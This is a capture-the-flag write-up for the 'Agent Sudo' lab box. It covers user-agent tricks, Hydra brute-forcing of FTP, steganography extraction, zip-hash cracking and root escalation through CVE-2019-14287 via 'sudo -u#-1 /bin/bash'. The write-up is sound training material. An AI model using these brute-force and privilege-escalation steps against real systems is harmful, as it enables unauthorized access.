# Agent Sudo {% embed url="" %} ### Enumerate Upon launching the box and entering the site, I am greeted with this: ![](https://850580359-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FSqAgfe92W3tM8LBhIHHu%2Fuploads%2FgA9HVYjwEP8auquOjYF4%2Fimage.png?alt=media\&token=a75276ef-c072-489e-9748-ca895a9ce84a) I check if any extra directories exist and do a nmap scan to find some access points. No helpful directories exist but there are 3 ports open ftp, ssh, and http. Next, I looked into the user-agent codenames, and at first I was confused about how to approach this and what my input should be. Eventually, I found that the user-agent should be altered to match some alphabet letters. After trying A, B, and C, I got this message with C as the user-agent: ![](https://850580359-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FSqAgfe92W3tM8LBhIHHu%2Fuploads%2FqDFVaYwfFAQXUZT0oV0c%2Fimage.png?alt=media\&token=5e195beb-832c-48ff-af5a-5c855b7fb742) ### Hash Cracking and Brute Force Now that I had a username I can attempt brute forcing the ftp service. Hydra works perfectly and fetches the password "**crystal**". There were a couple of files to extract with 2 being .png and 1 being a .txt file. The text file stated this: ![](https://850580359-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FSqAgfe92W3tM8LBhIHHu%2Fuploads%2F530awb0VwOIvjR6v8rp5%2Fimage.png?alt=media\&token=6253e320-722d-4e28-9897-9001cfbdce7f) I then used binwalk to extract out information from at least one .png file. I was able to receive a folder called "**\_cutie.png.extracted**". Upon opening that directory I found a zip file that was password protected. This requires a tool like john2zip to get the hash and then use john to extract the password to unzip the file. ![](https://850580359-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FSqAgfe92W3tM8LBhIHHu%2Fuploads%2FdhGg04KKnWB2hQEQzkiK%2Fimage.png?alt=media\&token=8abd0ffb-445c-496a-b0a2-f2b8ca94c16f) Once unzipped, I opened a message that contained a potential password, however, it was not working as a valid credential so I figured that something was not complete. ![](https://850580359-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FSqAgfe92W3tM8LBhIHHu%2Fuploads%2FmqWelCplpo1EJq2VJ6P6%2Fimage.png?alt=media\&token=4819d0fb-9f6d-4747-9eb6-d003027ab2db) After a base64 decoding, I got this password. ![](https://850580359-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FSqAgfe92W3tM8LBhIHHu%2Fuploads%2F50NAT5Ht4Zq5mTc21TGH%2Fimage.png?alt=media\&token=5436bfcc-8471-4803-8c05-34ec6168bbd6) After all that, I used steghide against the untouched .png file. It prompted a password as expected, and delivered a text file. ![](https://850580359-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FSqAgfe92W3tM8LBhIHHu%2Fuploads%2FYX33YitpXakn94rqDzyA%2Fimage.png?alt=media\&token=d1f0ad13-94c5-4dc1-9212-b0727c640ef6) ![](https://850580359-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FSqAgfe92W3tM8LBhIHHu%2Fuploads%2F7ApIaFqc14wUUA0pFTpq%2Fimage.png?alt=media\&token=e9af16e4-30d4-4a7f-a0c5-48aa883d0017) ### Capture the User Flag ssh into the user with the credentials and get the user flag. Next use `scp james@:Alien_autospy.jpg ./` to get the image onto your attacker machine. You can view the message and drop it into a reverse image bin then use some keywords from the image plus "Fox News". You should quickly be able to find what the photo incident is referring to. ### Privilege Escalation Lastly, check james privileges with `sudo -l` and you will notice james can run all commands except root on /bin/bash. ![](https://850580359-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FSqAgfe92W3tM8LBhIHHu%2Fuploads%2FDywQVuZGNODHLK8lZphU%2Fimage.png?alt=media\&token=c5b31067-57e3-4a08-b098-74b96265117f) Simply searching **(ALL, !root) /bin/bash** will show an exploit from exploitdb. CVE-2019-14287 After reading through the exploit you can find this `sudo -u#-1 /bin/bash`. This grants root access and you can then retrieve the final flag! ![](https://850580359-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FSqAgfe92W3tM8LBhIHHu%2Fuploads%2F7O5ccSesT2CW6G92G9I8%2Fimage.png?alt=media\&token=ecf7bea5-ae00-4128-9ee4-125c36b4de05)